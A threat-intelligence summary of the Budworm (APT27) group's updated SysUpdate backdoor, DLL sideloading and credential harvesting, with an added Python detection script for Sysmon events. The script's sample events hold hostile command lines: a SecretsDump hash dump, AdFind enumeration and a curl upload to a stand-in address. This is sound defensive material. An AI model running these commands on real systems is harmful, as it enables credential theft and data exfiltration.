The Budworm APT group is evolving its cyber arsenal. In the latest discovery, Symantec's Threat Hunter Team identified that Budworm has adapted and upgraded one of its primary tools. Two targets, an Asian government and a Middle Eastern telecommunications firm, were hit with the updated tooling.
Diving into the Details
- In August 2023, Budworm, also known as LuckyMouse, Emissary Panda, and APT27, deployed an updated version of its SysUpdate backdoor, delivered as the DLL inicore_v2.3.30.dll.
- The group combined this with a mix of custom malware, along with several living-off-the-land and publicly available tools.
- The activity appears to have been focused primarily on credential harvesting.
Analyzing the Arsenal
- Budworm's signature delivery technique is DLL sideloading: the legitimate INISafeWebSSO application is used to load the malicious SysUpdate DLL, so the backdoor runs inside a trusted process rather than as a stand-alone executable. The group has used this tactic since at least 2018.
- SysUpdate is a multifaceted backdoor with capabilities ranging from file management and command execution to taking screenshots and browsing processes.
- In the recent campaign the group also used publicly available and living-off-the-land tools: AdFind (Active Directory enumeration), Curl (data transfer), SecretsDump (the Impacket credential-dumping script), and PasswordDumper. Mixing custom malware with widely used utilities makes the activity harder to distinguish from legitimate administration.
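As an added example (not code from the Symantec report and not part of Budworm's toolset), the following Python script triages constructed Sysmon-style events for the two behaviours described in the bullets above: a legitimate host executable loading the SysUpdate DLL, and follow-on use of AdFind, SecretsDump and Curl. The Sysmon field names (Image, ImageLoaded, Signed, OriginalFileName, CommandLine) are real; the sample events, paths, the user-writable-directory heuristic and the curl upload-flag heuristic are assumptions made for illustration. The second rule generalizes beyond the specific DLL name to any unsigned DLL loaded by an executable from the same user-writable directory, which is the general shape of sideloading.

```python
"""Added example: triage constructed Sysmon-style events for SysUpdate
sideloading and Budworm's follow-on tooling. Not from the Symantec report."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Known host-executable -> sideloaded-DLL pair named in the text.
KNOWN_SIDELOAD_PAIRS = {"inisafewebsso.exe": {"inicore_v2.3.30.dll"}}

# Path fragments of directories a standard user can write to (assumption: a
# host EXE loading an unsigned DLL from its own directory in one of these is
# the generic sideloading shape, whatever the DLL is called).
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

# Tool detections: Sysmon's OriginalFileName (from the PE version resource)
# catches a renamed AdFind binary; command-line patterns catch script tools.
TOOL_ORIGINAL_NAMES = {"adfind.exe": "adfind"}
TOOL_CMDLINE_PATTERNS = {
    "adfind": re.compile(r'(^|[\\\s"])adfind(\.exe)?\b', re.I),
    "secretsdump": re.compile(r"secretsdump(\.py|\.exe)?\b", re.I),
}
# curl is common; only flag invocations that push data out (assumed heuristic).
CURL_UPLOAD_FLAGS = re.compile(r"(^|\s)(-T|--upload-file|-d|--data(-binary|-raw)?|-F|--form)\b")


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def _dirname(path: str) -> str:
    n = _norm(path)
    return n.rsplit("\\", 1)[0] if "\\" in n else ""


def check_image_load(ev: dict) -> List[Finding]:
    """Sysmon Event ID 7 (Image loaded): uses Image, ImageLoaded, Signed."""
    host, dll = _basename(ev["Image"]), _basename(ev["ImageLoaded"])
    found = []
    if dll in KNOWN_SIDELOAD_PAIRS.get(host, ()):
        found.append(Finding("sysupdate_known_sideload", f"{host} loaded {dll}"))
    same_dir = _dirname(ev["Image"]) == _dirname(ev["ImageLoaded"])
    unsigned = str(ev.get("Signed", "false")).lower() != "true"
    in_user_dir = any(m in _norm(ev["ImageLoaded"]) for m in USER_WRITABLE_MARKERS)
    if same_dir and unsigned and in_user_dir:
        found.append(Finding("unsigned_dll_sideload",
                             f"{host} loaded unsigned {dll} from its own user-writable directory"))
    return found


def check_process_create(ev: dict) -> List[Finding]:
    """Sysmon Event ID 1 (Process creation): uses Image, OriginalFileName, CommandLine."""
    found, seen = [], set()
    cmd = ev.get("CommandLine", "")
    orig = ev.get("OriginalFileName", "").lower()
    if orig in TOOL_ORIGINAL_NAMES:
        tool = TOOL_ORIGINAL_NAMES[orig]
        seen.add(tool)
        found.append(Finding(f"tool_{tool}", f"OriginalFileName={orig} run as {_basename(ev['Image'])}"))
    for tool, pattern in TOOL_CMDLINE_PATTERNS.items():
        if tool not in seen and pattern.search(cmd):
            found.append(Finding(f"tool_{tool}", cmd))
    if _basename(ev.get("Image", "")) in ("curl.exe", "curl") and CURL_UPLOAD_FLAGS.search(cmd):
        found.append(Finding("curl_upload", cmd))
    return found


def triage(events: Iterable[dict]) -> List[Finding]:
    """Route each event to the checker for its Sysmon EventID."""
    found: List[Finding] = []
    for ev in events:
        if ev["EventID"] == 7:
            found += check_image_load(ev)
        elif ev["EventID"] == 1:
            found += check_process_create(ev)
    return found


# Constructed sample events (paths, names and the 203.0.113.5 address are made up).
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\Public\Libraries\INISafeWebSSO.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\inicore_v2.3.30.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\INISafeWebSSO.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Users\Public\af.exe", "OriginalFileName": "AdFind.exe",
     "CommandLine": r'"C:\Users\Public\af.exe" -f objectcategory=person samaccountname'},
    {"EventID": 1, "Image": r"C:\Python39\python.exe", "OriginalFileName": "python.exe",
     "CommandLine": "python.exe secretsdump.py -sam sam.save -system system.save LOCAL"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -T C:\Users\Public\out.zip http://203.0.113.5/up"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -sSL https://example.com/update.zip -o update.zip"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:26} {f.detail}")
```

Run against the constructed events, the first image-load event trips both the named-pair rule and the generic unsigned-DLL rule, the renamed AdFind binary is caught by OriginalFileName rather than by its command line, and the plain curl download is left alone. In production the same logic would sit on a Sysmon or EDR feed rather than on a hard-coded list.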
Why this matters
- Active since at least 2013, Budworm has primarily targeted entities in the defense, government, and technology sectors, particularly in Southeast Asia, the Middle East, and the U.S.
- APT27’s victim profile, such as the recent targeting of an Asian government and a Middle Eastern telecom firm, aligns with its intelligence-gathering objectives.
- The updated SysUpdate shows that the group is still actively developing its toolset.
The bottom line
Patching remains important, but SysUpdate is delivered by sideloading a malicious DLL into a legitimate application rather than by exploiting a software flaw, so patching alone will not stop it. Organizations should also monitor for legitimate executables loading unsigned DLLs from unexpected locations and for use of tools such as AdFind and SecretsDump. Threat intelligence and monitoring solutions can help identify and counteract unusual activity, especially activity associated with known threat actors such as Budworm.